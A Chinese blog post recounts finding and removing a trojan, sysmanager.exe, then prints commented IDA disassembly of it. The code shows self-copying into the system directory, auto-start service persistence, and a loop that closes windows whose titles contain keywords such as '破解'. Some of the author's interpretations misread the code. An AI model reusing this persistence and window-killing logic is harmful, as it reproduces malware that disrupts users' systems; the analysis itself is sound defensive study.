这几天不知道为啥子电脑速度特别慢,而且有些网页打开后就直接将浏览器关闭了,搞得我很郁闷.用杀毒软件查杀,结果啥都没查出来...于是很纠结,还是手动杀毒比较靠谱...因为这些网页打开的都有些破解,逆向等字眼,所以就怀疑它是根据关键字来进行工作的,于是新建了一个“逆向破 解.txt”,用记事本打开,果然:一打开它就关闭了,换editplus打开,结果还是一样,而换了文件名打开就正常了.
因为对于每个进程都会产生这种情况,所以初步怀疑是dll注入,可对照两个进程的dll,除了系统的dll,貌似也没啥子问题,而注入系统dll的可能性不大,所以还是另寻他法吧。
将电脑在安全模式下打开,观察进程列表,然后电脑正常模式下打开,观察进程列表,然后再进行一个一个排除。
经过反复的测试,确定是sysmanager.exe文件的问题,关闭进程,结果能正常运行。结果百度了下该进程,果然是个病毒木马程序,然后清理注册表,删除程序,ok,杀毒完毕!!!
本来到这里都应该结束了,但是一时也没啥事干,而且这东西搞得我郁闷无比!!!所以还是决定分析下。
PEiD查壳:Microsoft Visual C++ 6.0
这是一个好消息,接着就IDA + OD进行分析吧.
代码:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:004014F0 _WinMain@16 proc near ; CODE XREF: start+12Fp
.text:004014F0
.text:004014F0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004014F0 var_8 = dword ptr -8
.text:004014F0 var_4 = dword ptr -4
.text:004014F0 hInstance = dword ptr 4
.text:004014F0 hPrevInstance = dword ptr 8
.text:004014F0 Str1 = dword ptr 0Ch
.text:004014F0 nShowCmd = dword ptr 10h
.text:004014F0
.text:004014F0 sub esp, 10h
.text:004014F3 call sub_401000
.text:004014F8 call ds:GetCurrentThreadId
.text:004014FE mov dword_403068, eax
.text:00401503 xor eax, eax
.text:00401505 mov [esp+10h+var_8], eax
.text:00401509 mov [esp+10h+var_4], eax
.text:0040150D mov eax, [esp+10h+Str1]
//判断是否为删除指令,如果是,那么删除服务,卸载程序
.text:00401511 push offset Str2 ; "/uninstall"
.text:00401516 push eax ; Str1
.text:00401517 mov [esp+18h+ServiceStartTable.lpServiceName], offset ServiceName ; "SystemManager"
.text:0040151F mov [esp+18h+ServiceStartTable.lpServiceProc], offset loc_401450
.text:00401527 call ds:_stricmp
.text:0040152D add esp, 8
.text:00401530 test eax, eax
.text:00401532 jnz short loc_401541
.text:00401534 call sub_401220
.text:00401539 xor eax, eax
.text:0040153B add esp, 10h
.text:0040153E retn 10h
.text:00401541 ; ---------------------------------------------------------------------------
.text:00401541
.text:00401541 loc_401541: ; CODE XREF: WinMain(x,x,x,x)+42j
.text:00401541 call sub_401040
.text:00401546 lea ecx, [esp+10h+ServiceStartTable]
//函数StartServiceCtrlDispatcherA的利用
//对于每一个新建的进程,创建一个线程,进行检测操作
.text:0040154A push ecx ; lpServiceStartTable
.text:0040154B call ds:StartServiceCtrlDispatcherA
.text:00401551 xor eax, eax
.text:00401553 add esp, 10h
.text:00401556 retn 10h
.text:00401556 _WinMain@16 endp
typedef struct _SERVICE_TABLE_ENTRY {
LPTSTR lpServiceName;
LPSERVICE_MAIN_FUNCTION lpServiceProc;
} SERVICE_TABLE_ENTRY,
lpServiceProc = 401450
//将sysmanager.exe复制到系统目录,并创建启动服务
.text:00401040 sub esp, 220h
.text:00401046 lea eax, [esp+220h+NewFileName]
.text:0040104A push ebx
.text:0040104B push esi
.text:0040104C push edi
.text:0040104D push 100h ; uSize
.text:00401052 push eax ; lpBuffer
.text:00401053 call ds:GetSystemDirectoryA
.text:00401059 mov edi, offset aSysmanager_exe ; "\\sysmanager.exe"
.text:0040105E or ecx, 0FFFFFFFFh
.text:00401061 xor eax, eax
.text:00401063 lea edx, [esp+22Ch+NewFileName]
.text:00401067 repne scasb
.text:00401069 not ecx
.text:0040106B sub edi, ecx
.text:0040106D push 104h ; nSize
.text:00401072 mov esi, edi
.text:00401074 mov ebx, ecx
.text:00401076 mov edi, edx
.text:00401078 or ecx, 0FFFFFFFFh
.text:0040107B repne scasb
.text:0040107D mov ecx, ebx
.text:0040107F dec edi
.text:00401080 shr ecx, 2
.text:00401083 rep movsd
.text:00401085 mov ecx, ebx
.text:00401087 lea eax, [esp+230h+ExistingFileName]
.text:0040108E and ecx, 3
.text:00401091 push eax ; lpFilename
.text:00401092 rep movsb
.text:00401094 push 0 ; hModule
//获取自身程序名
.text:00401096 call ds:GetModuleFileNameA
.text:0040109C lea ecx, [esp+22Ch+NewFileName]
.text:004010A0 push 0 ; bFailIfExists
.text:004010A2 lea edx, [esp+230h+ExistingFileName]
.text:004010A9 push ecx ; lpNewFileName
.text:004010AA push edx ; lpExistingFileName
//复制文件
.text:004010AB call ds:CopyFileA
.text:004010B1 test eax, eax
.text:004010B3 jnz short loc_4010BF
.text:004010B5 pop edi
.text:004010B6 pop esi
.text:004010B7 pop ebx
.text:004010B8 add esp, 220h
.text:004010BE retn
.text:004010BF ; ---------------------------------------------------------------------------
.text:004010BF
.text:004010BF loc_4010BF: ; CODE XREF: sub_401040+73j
.text:004010BF push 0F003Fh ; dwDesiredAccess
.text:004010C4 push 0 ; lpDatabaseName
.text:004010C6 push 0 ; lpMachineName
//打开服务管理
.text:004010C8 call ds:OpenSCManagerA
.text:004010CE test eax, eax
.text:004010D0 mov hSCObject, eax
.text:004010D5 jnz short loc_4010E1
.text:004010D7 pop edi
.text:004010D8 pop esi
.text:004010D9 pop ebx
.text:004010DA add esp, 220h
.text:004010E0 retn
.text:004010E1 ; ---------------------------------------------------------------------------
.text:004010E1
.text:004010E1 loc_4010E1: ; CODE XREF: sub_401040+95j
.text:004010E1 push 0 ; lpPassword
.text:004010E3 push 0 ; lpServiceStartName
.text:004010E5 push offset Dependencies ; lpDependencies
.text:004010EA push 0 ; lpdwTagId
.text:004010EC lea ecx, [esp+23Ch+NewFileName]
.text:004010F0 push 0 ; lpLoadOrderGroup
.text:004010F2 push ecx ; lpBinaryPathName
.text:004010F3 mov ebx, 2
.text:004010F8 push 1 ; dwErrorControl
.text:004010FA push ebx ; dwStartType
.text:004010FB push 110h ; dwServiceType
.text:00401100 push 0F01FFh ; dwDesiredAccess
.text:00401105 push offset ServiceName ; "SystemManager"
.text:0040110A push offset ServiceName ; "SystemManager"
.text:0040110F push eax ; hSCManage
//创建服务
.text:00401110 call ds:CreateServiceA
.text:00401116 mov esi, ds:GetLastError
.text:0040111C mov dword_403060, eax
.text:00401121 test eax, eax
.text:00401123 jnz short loc_40117C
.text:00401125 call esi ; GetLastError
.text:00401127 cmp eax, 431h
.text:0040112C jz short loc_401147
.text:0040112E mov edx, hSCObject
.text:00401134 push edx ; hSCObject
.text:00401135 call ds:CloseServiceHandle
.text:0040113B pop edi
.text:0040113C pop esi
.text:0040113D xor eax, eax
.text:0040113F pop ebx
.text:00401140 add esp, 220h
.text:00401146 retn
.text:00401147 ; ---------------------------------------------------------------------------
.text:00401147
.text:00401147 loc_401147: ; CODE XREF: sub_401040+ECj
.text:00401147 mov eax, hSCObject
.text:0040114C push 10h ; dwDesiredAccess
.text:0040114E push offset ServiceName ; "SystemManager"
.text:00401153 push eax ; hSCManager
//打开服务
.text:00401154 call ds:OpenServiceA
.text:0040115A test eax, eax
.text:0040115C mov dword_403060, eax
.text:00401161 jnz short loc_40117C
.text:00401163 mov ecx, hSCObject
.text:00401169 push ecx ; hSCObject
.text:0040116A call ds:CloseServiceHandle
.text:00401170 pop edi
.text:00401171 pop esi
.text:00401172 xor eax, eax
.text:00401174 pop ebx
.text:00401175 add esp, 220h
.text:0040117B retn
//删除服务
sub_401220 proc near ; CODE XREF: WinMain(x,x,x,x)+44p
.text:00401220 push esi
.text:00401221 push 0F003Fh ; dwDesiredAccess
.text:00401226 push 0 ; lpDatabaseName
.text:00401228 push 0 ; lpMachineName
.text:0040122A call ds:OpenSCManagerA
.text:00401230 test eax, eax
.text:00401232 mov hSCObject, eax
.text:00401237 jz loc_4012C3
.text:0040123D push 0F01FFh ; dwDesiredAccess
.text:00401242 push offset ServiceName ; "SystemManager"
.text:00401247 push eax ; hSCManager
.text:00401248 call ds:OpenServiceA
.text:0040124E test eax, eax
.text:00401250 mov dword_403060, eax
.text:00401255 jz short loc_4012C3
.text:00401257 push offset ServiceStatus ; lpServiceStatus
.text:0040125C push eax ; hService
.text:0040125D call ds:QueryServiceStatus
.text:00401263 cmp ServiceStatus.dwCurrentState, 4
.text:0040126A jnz short loc_40127F
.text:0040126C mov eax, dword_403060
.text:00401271 push offset ServiceStatus ; lpServiceStatus
.text:00401276 push 1 ; dwControl
.text:00401278 push eax ; hService
.text:00401279 call ds:ControlService
.text:0040127F
.text:0040127F loc_40127F: ; CODE XREF: sub_401220+4Aj
.text:0040127F mov ecx, dword_403060
.text:00401285 push ecx ; hService
.text:00401286 call ds:DeleteService
.text:0040128C test eax, eax
.text:0040128E jz short loc_4012AB
.text:00401290 mov edx, hSCObject
.text:00401296 mov esi, ds:CloseServiceHandle
.text:0040129C push edx ; hSCObject
.text:0040129D call esi ; CloseServiceHandle
.text:0040129F mov eax, dword_403060
.text:004012A4 push eax ; hSCObject
.text:004012A5 call esi ; CloseServiceHandle
.text:004012A7 xor eax, eax
.text:004012A9 pop esi
.text:004012AA retn
xt:00401450 loc_401450: ; DATA XREF: WinMain(x,x,x,x)+2Fo
.text:00401450 push offset sub_4012D0
.text:00401455 push offset ServiceName ; "SystemManager"
.text:0040145A mov ServiceStatus.dwCurrentState, 2
.text:00401464 mov ServiceStatus.dwControlsAccepted, 3
.text:0040146E call ds:RegisterServiceCtrlHandlerA
.text:00401474 test eax, eax
.text:00401476 mov hServiceStatus, eax
.text:0040147B jz short locret_4014E4
.text:0040147D push esi
.text:0040147E mov esi, ds:SetServiceStatus
.text:00401484 push offset ServiceStatus
.text:00401489 push eax
.text:0040148A call esi ; SetServiceStatus
.text:0040148C mov eax, hServiceStatus
.text:00401491 push offset ServiceStatus
.text:00401496 push eax
.text:00401497
.text:00401497 __cfltcvt_init:
.text:00401497 mov ServiceStatus.dwWin32ExitCode, 0
.text:004014A1 mov ServiceStatus.dwCheckPoint, 0
.text:004014AB mov ServiceStatus.dwWaitHint, 0
.text:004014B5 mov ServiceStatus.dwCurrentState, 4
.text:004014BF call esi ; SetServiceStatus
.text:004014C1 push 0
.text:004014C3 push 0
.text:004014C5 push 0
.text:004014C7 push offset sub_401380
.text:004014CC push 0
.text:004014CE push 0
.text:004014D0 call ds:CreateThread
.text:004014D6 test eax, eax
.text:004014D8 pop esi
.text:004014D9 jz short locret_4014E4
.text:004014DB push 0FFFFFFFFh
.text:004014DD push eax
.text:004014DE call ds:WaitForSingleObject
.text:004014E4
.text:004014E4 locret_4014E4: ; CODE XREF: .text:0040147Bj
.text:004014E4 ; .text:004014D9j
.text:004014E4 retn
对于每个新建的进程,都创建一个线程,线程函数地址:sub_401380
sub_401380 proc near ; DATA XREF: .text:004014C7o
.text:00401380
.text:00401380 String = byte ptr -104h
.text:00401380
.text:00401380 sub esp, 104h
.text:00401386 push ebx
.text:00401387 mov ebx, ds:_mbsstr
.text:0040138D push esi
.text:0040138E push edi
.text:0040138F
.text:0040138F loc_40138F: ; CODE XREF: sub_401380+47j
.text:0040138F ; sub_401380+BEj
.text:0040138F push 3E8h ; dwMilliseconds
.text:00401394 call ds:Sleep
.text:0040139A xor eax, eax
.text:0040139C mov ecx, 19h
.text:004013A1 mov edi, offset dword_403094
.text:004013A6 push eax ; lParam
.text:004013A7 rep stosd
.text:004013A9 push offset EnumFunc ; lpEnumFunc
.text:004013AE mov dword_403224, 0
.text:004013B8 call ds:EnumWindows //枚举窗口
.text:004013BE mov eax, dword_403224
.text:004013C3 xor edi, edi
.text:004013C5 test eax, eax
.text:004013C7 jle short loc_40138F
.text:004013C9 mov esi, offset dword_403094
.text:004013CE
.text:004013CE loc_4013CE: ; CODE XREF: sub_401380+BCj
.text:004013CE mov eax, [esi]
.text:004013D0 test eax, eax
.text:004013D2 jz short loc_401431
.text:004013D4 lea ecx, [esp+110h+String]
.text:004013D8 push 80h ; nMaxCount
.text:004013DD push ecx ; lpString
.text:004013DE push eax ; hWnd
.text:004013DF call ds:GetWindowTextA //获取窗口文本
.text:004013E5 test eax, eax
.text:004013E7 jz short loc_401431
.text:004013E9 lea edx, [esp+110h+String]
.text:004013ED push offset unk_403040
.text:004013F2 push edx
.text:004013F3 call ebx ; _mbsstr
.text:004013F5 add esp, 8
.text:004013F8 test eax, eax
.text:004013FA jnz short loc_401422
.text:004013FC lea eax, [esp+110h+String]
.text:00401400 push offset aI ; "专用"
.text:00401405 push eax
.text:00401406 call ebx ; _mbsstr //检测关键字:专用
.text:00401408 add esp, 8
.text:0040140B test eax, eax
.text:0040140D jnz short loc_401422
.text:0040140F lea ecx, [esp+110h+String]
.text:00401413 push offset aT ; "破解"
.text:00401418 push ecx
.text:00401419 call ebx ; _mbsstr //检测关键字:破解
.text:0040141B add esp, 8
.text:0040141E test eax, eax
.text:00401420 jz short loc_401431
.text:00401422
.text:00401422 loc_401422: ; CODE XREF: sub_401380+7Aj
.text:00401422 ; sub_401380+8Dj
.text:00401422 mov edx, [esi]
.text:00401424 push 0 ; lParam
.text:00401426 push 0 ; wParam
.text:00401428 push 10h ; Msg
.text:0040142A push edx ; hWnd
.text:0040142B call ds:SendMessageA //发送消息,关闭进程
.text:00401431
.text:00401431 loc_401431: ; CODE XREF: sub_401380+52j
.text:00401431 ; sub_401380+67j ...
.text:00401431 mov eax, dword_403224
.text:00401436 inc edi
.text:00401437 add esi, 4
.text:0040143A cmp edi, eax
.text:0040143C jl short loc_4013CE
.text:0040143E jmp loc_40138F
.text:0040143E sub_401380 endp
到这里就分析完毕了,终于知道啥原因了,同时也学了个函数StartServiceCtrlDispatcherA,这是一个好函数,用来做文件监控真是再好不过了,而且可以对一些关键字进行过滤,假如:有关破解逆向的网页全部都被屏蔽掉了.好东西,学习了.
